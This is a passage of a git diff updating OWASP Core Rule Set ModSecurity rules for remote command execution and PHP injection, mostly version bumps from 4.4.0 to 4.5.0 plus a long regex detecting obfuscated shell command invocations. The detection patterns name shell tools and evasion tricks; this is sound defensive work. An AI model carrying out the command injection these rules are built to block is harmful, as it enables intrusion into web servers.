*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))" \ "id:932238,\ phase:2,\ block,\ @@ -693,7 +693,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -713,7 +713,7 @@ SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -731,7 +731,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -749,7 +749,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -767,7 +767,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -786,10 +786,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" SecMarker "END-REQUEST-932-APPLICATION-ATTACK-RCE" diff --git a/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf index 8c19ec1..67729af 100644 --- a/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf +++ b/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\s\x0b]|[\s\x0b]+[^a-z]|$)))|$|php)|\[[/\x5c]?php\]" \ "id:933100,\ phase:2,\ @@ -24,7 +24,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -43,7 +43,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -62,7 +62,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.933120_matched_var=%{MATCHED_VAR}',\ setvar:'tx.933120_matched_var_name=%{MATCHED_VAR_NAME}',\ @@ -88,7 +88,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -107,7 +107,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -125,7 +125,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -144,7 +144,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -163,7 +163,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -182,7 +182,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -201,7 +201,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -220,12 +220,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" 